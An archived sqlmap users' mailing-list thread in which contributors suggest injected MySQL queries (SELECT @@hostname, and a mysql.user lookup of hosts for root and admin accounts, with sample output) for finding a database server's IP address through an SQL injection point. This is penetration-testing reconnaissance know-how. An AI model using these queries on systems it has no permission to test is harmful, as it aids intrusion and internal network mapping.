Thread: [sqlmap-users] SQL Query To Retrieve MySQL Server IP Address
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users
|
From: Zaki A. <zak...@gm...> - 2012-11-28 08:32:07
|
Hello, I found SQL injection vulnerability. I want to know the database server IP address. From the fingerprint result, the database server is MySQL. How should I write the --sql-query so that I could retrieve the MySQL database server IP address? It's n-tier web appliction. $ python sqlmap.py -u something --sql-query="" Just an idea: maybe it's possible to add a built-in sql query function to retrieve database server IP address whatever the databases is used (or I am the one who didn't know it?) Thanks, -- Zaki Akhmad |
|
From: Leon J. <leo...@gm...> - 2012-11-28 08:39:56
|
On Wed, Nov 28, 2012 at 10:31 AM, Zaki Akhmad <zak...@gm...> wrote: > Hello, > > I found SQL injection vulnerability. I want to know the database > server IP address. From the fingerprint result, the database server is > MySQL. How should I write the --sql-query so that I could retrieve the > MySQL database server IP address? It's n-tier web appliction. > > $ python sqlmap.py -u something --sql-query="" > > Just an idea: maybe it's possible to add a built-in sql query function > to retrieve database server IP address whatever the databases is used > (or I am the one who didn't know it?) > > Thanks, > If its MySQL and according to [1], try: $ python sqlmap.py -u something --sql-query="show variables where Variable_name = 'hostname'" I am not 100% sure about the required permissions/escaping that might be needed to achieve this via your injection point though... -- Regards Leon Jacobs Sent using electronic mail ツ [1] http://dev.mysql.com/doc/refman/5.1/en/show-variables.html |
|
From: Zaki A. <zak...@gm...> - 2012-11-28 08:45:58
|
On Wed, Nov 28, 2012 at 3:39 PM, Leon Jacobs <leo...@gm...> wrote: > If its MySQL and according to [1], try: > > $ python sqlmap.py -u something --sql-query="show variables where > Variable_name = 'hostname'" > > I am not 100% sure about the required permissions/escaping that might be > needed to achieve this via your injection point though... Here's the result: Is it not possible from the injection point? Or are there any other sql-query? back-end DBMS: MySQL 5.0 [15:43:37] [INFO] fetching SQL SELECT statement query output: 'show variables where Variable_name = 'hostname'' [15:43:37] [WARNING] reflective value(s) found and filtering out [15:43:37] [INFO] resumed: None show variables where Variable_name = 'hostname': 'None' -- Zaki Akhmad |
|
From: Miroslav S. <mir...@gm...> - 2012-11-28 08:48:44
|
That proposed solution is equivalent to the SELECT @@hostname (except that last one doesn't need that non-query SHOW statement). Only thing is that you'll get a same result as in --hostname which is not an IP address that your require. Have to seek what can be used here. Kind regards On Wed, Nov 28, 2012 at 9:39 AM, Leon Jacobs <leo...@gm...> wrote: > On Wed, Nov 28, 2012 at 10:31 AM, Zaki Akhmad <zak...@gm...>wrote: > >> Hello, >> >> I found SQL injection vulnerability. I want to know the database >> server IP address. From the fingerprint result, the database server is >> MySQL. How should I write the --sql-query so that I could retrieve the >> MySQL database server IP address? It's n-tier web appliction. >> >> $ python sqlmap.py -u something --sql-query="" >> >> Just an idea: maybe it's possible to add a built-in sql query function >> to retrieve database server IP address whatever the databases is used >> (or I am the one who didn't know it?) >> >> Thanks, >> > > If its MySQL and according to [1], try: > > $ python sqlmap.py -u something --sql-query="show variables where > Variable_name = 'hostname'" > > I am not 100% sure about the required permissions/escaping that might be > needed to achieve this via your injection point though... > > -- > Regards > Leon Jacobs > > Sent using electronic mail ツ > > [1] http://dev.mysql.com/doc/refman/5.1/en/show-variables.html > > > ------------------------------------------------------------------------------ > Keep yourself connected to Go Parallel: > INSIGHTS What's next for parallel hardware, programming and related areas? > Interviews and blogs by thought leaders keep you ahead of the curve. > http://goparallel.sourceforge.net > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Leon J. <leo...@gm...> - 2012-11-28 08:53:32
|
On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar < mir...@gm...> wrote: > That proposed solution is equivalent to the SELECT @@hostname (except that > last one doesn't need that non-query SHOW statement). Only thing is that > you'll get a same result as in --hostname which is not an IP address that > your require. Have to seek what can be used here. Yeah this is perfect. And then hopefully getting the IP is as simple as looking up the hostname, assuming it resolves but that is not guaranteed. =p -- Regards Leon Jacobs Sent using electronic mail ツ |
|
From: Zaki A. <zak...@gm...> - 2012-11-28 08:56:00
|
On Wed, Nov 28, 2012 at 3:53 PM, Leon Jacobs <leo...@gm...> wrote: > On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar > <mir...@gm...> wrote: >> >> That proposed solution is equivalent to the SELECT @@hostname (except that >> last one doesn't need that non-query SHOW statement). Only thing is that >> you'll get a same result as in --hostname which is not an IP address that >> your require. Have to seek what can be used here. > > > Yeah this is perfect. And then hopefully getting the IP is as simple as > looking up the hostname, assuming it resolves but that is not guaranteed. =p the --sql-query="select @@hostname" works :-) -- Zaki Akhmad |
|
From: Miroslav S. <mir...@gm...> - 2012-11-28 09:04:38
|
Hi. If you want to get IP addresses of interest you could try something like this: --sql-query="SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%'" back-end DBMS: MySQL >= 5.0.0 [10:00:24] [INFO] fetching SQL SELECT statement query output: 'SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%'' SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%' [6]: [*] 127.0.0.1, root [*] 172.16.162.1, root [*] 192.168.21.1, root [*] debian-5.0-i386, root [*] localhost, root Kind regards, Miroslav Stampar On Wed, Nov 28, 2012 at 9:55 AM, Zaki Akhmad <zak...@gm...> wrote: > On Wed, Nov 28, 2012 at 3:53 PM, Leon Jacobs <leo...@gm...> wrote: > > On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar > > <mir...@gm...> wrote: > >> > >> That proposed solution is equivalent to the SELECT @@hostname (except > that > >> last one doesn't need that non-query SHOW statement). Only thing is that > >> you'll get a same result as in --hostname which is not an IP address > that > >> your require. Have to seek what can be used here. > > > > > > Yeah this is perfect. And then hopefully getting the IP is as simple as > > looking up the hostname, assuming it resolves but that is not > guaranteed. =p > > the --sql-query="select @@hostname" works :-) > > -- > Zaki Akhmad > -- Miroslav Stampar http://about.me/stamparm |
|
From: Zaki A. <zak...@gm...> - 2012-11-28 09:15:06
|
On Wed, Nov 28, 2012 at 4:04 PM, Miroslav Stampar <mir...@gm...> wrote: > Hi. > > If you want to get IP addresses of interest you could try something like > this: > --sql-query="SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR > user LIKE '%admin%'" > > back-end DBMS: MySQL >= 5.0.0 > [10:00:24] [INFO] fetching SQL SELECT statement query output: 'SELECT host, > user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%'' > SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE > '%admin%' [6]: > [*] 127.0.0.1, root > [*] 172.16.162.1, root > [*] 192.168.21.1, root > [*] debian-5.0-i386, root > [*] localhost, root Thanks a lot, Miroslav. -- Zaki Akhmad |
|
From: Stephen S. <ss...@ss...> - 2012-11-28 09:12:43
|
Don't all these current methods rely on either the hostname of the MySQL server to be something that actually resolves, or a authentication rule using a public IP? If a server is NAT'd, won't both of these fail? Could a more reliable way of getting the IP/hostname be make a DNS request or simliar, that way you'll get the public IP as long as it can make an outgoing connection (which seems more likely on average than having a rule for authenticating users with it, or having the hostname be resolvable). Maybe sqlmap could try a combination of these for an improved hostname lookup? Or is this more work for a edge case (or possibly what I said above is wrong and one of the other methods will consistently work). On Wed, Nov 28, 2012 at 10:04 PM, Miroslav Stampar < mir...@gm...> wrote: > Hi. > > If you want to get IP addresses of interest you could try something like > this: > --sql-query="SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR > user LIKE '%admin%'" > > back-end DBMS: MySQL >= 5.0.0 > [10:00:24] [INFO] fetching SQL SELECT statement query output: 'SELECT > host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%'' > SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE > '%admin%' [6]: > [*] 127.0.0.1, root > [*] 172.16.162.1, root > [*] 192.168.21.1, root > [*] debian-5.0-i386, root > [*] localhost, root > > Kind regards, > Miroslav Stampar > > > On Wed, Nov 28, 2012 at 9:55 AM, Zaki Akhmad <zak...@gm...> wrote: > >> On Wed, Nov 28, 2012 at 3:53 PM, Leon Jacobs <leo...@gm...> wrote: >> > On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar >> > <mir...@gm...> wrote: >> >> >> >> That proposed solution is equivalent to the SELECT @@hostname (except >> that >> >> last one doesn't need that non-query SHOW statement). Only thing is >> that >> >> you'll get a same result as in --hostname which is not an IP address >> that >> >> your require. Have to seek what can be used here. >> > >> > >> > Yeah this is perfect. And then hopefully getting the IP is as simple as >> > looking up the hostname, assuming it resolves but that is not >> guaranteed. =p >> >> the --sql-query="select @@hostname" works :-) >> >> -- >> Zaki Akhmad >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > Keep yourself connected to Go Parallel: > INSIGHTS What's next for parallel hardware, programming and related areas? > Interviews and blogs by thought leaders keep you ahead of the curve. > http://goparallel.sourceforge.net > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Miroslav S. <mir...@gm...> - 2012-11-28 09:25:33
|
On Wed, Nov 28, 2012 at 10:12 AM, Stephen Shkardoon <ss...@ss...>wrote: > Don't all these current methods rely on either the hostname of the MySQL > server to be something that actually resolves, or a authentication rule > using a public IP? If a server is NAT'd, won't both of these fail? > Could a more reliable way of getting the IP/hostname be make a DNS request > or simliar, that way you'll get the public IP as long as it can make an > outgoing connection (which seems more likely on average than having a rule > for authenticating users with it, or having the hostname be resolvable). > Maybe sqlmap could try a combination of these for an improved hostname > lookup? Or is this more work for a edge case (or possibly what I said above > is wrong and one of the other methods will consistently work). > More work than benefit(s). We won't extend this any further than --hostname switch itself. I just wrote that last method as it could give you a list of IP addresses from where root/admin can connect. Thing is that database administrators tend to put all sorts of IP addresses and a wild guess is that you'll get some interesting ones there (hostname itself, ip addresses coming from a local network,...). > > > On Wed, Nov 28, 2012 at 10:04 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> Hi. >> >> If you want to get IP addresses of interest you could try something like >> this: >> --sql-query="SELECT host, user FROM mysql.user WHERE user LIKE '%root%' >> OR user LIKE '%admin%'" >> >> back-end DBMS: MySQL >= 5.0.0 >> [10:00:24] [INFO] fetching SQL SELECT statement query output: 'SELECT >> host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%'' >> SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE >> '%admin%' [6]: >> [*] 127.0.0.1, root >> [*] 172.16.162.1, root >> [*] 192.168.21.1, root >> [*] debian-5.0-i386, root >> [*] localhost, root >> >> Kind regards, >> Miroslav Stampar >> >> >> On Wed, Nov 28, 2012 at 9:55 AM, Zaki Akhmad <zak...@gm...>wrote: >> >>> On Wed, Nov 28, 2012 at 3:53 PM, Leon Jacobs <leo...@gm...> >>> wrote: >>> > On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar >>> > <mir...@gm...> wrote: >>> >> >>> >> That proposed solution is equivalent to the SELECT @@hostname (except >>> that >>> >> last one doesn't need that non-query SHOW statement). Only thing is >>> that >>> >> you'll get a same result as in --hostname which is not an IP address >>> that >>> >> your require. Have to seek what can be used here. >>> > >>> > >>> > Yeah this is perfect. And then hopefully getting the IP is as simple as >>> > looking up the hostname, assuming it resolves but that is not >>> guaranteed. =p >>> >>> the --sql-query="select @@hostname" works :-) >>> >>> -- >>> Zaki Akhmad >>> >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> >> >> ------------------------------------------------------------------------------ >> Keep yourself connected to Go Parallel: >> INSIGHTS What's next for parallel hardware, programming and related areas? >> Interviews and blogs by thought leaders keep you ahead of the curve. >> http://goparallel.sourceforge.net >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > -- Miroslav Stampar http://about.me/stamparm |
×
Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.
Thanks for helping keep SourceForge clean.
X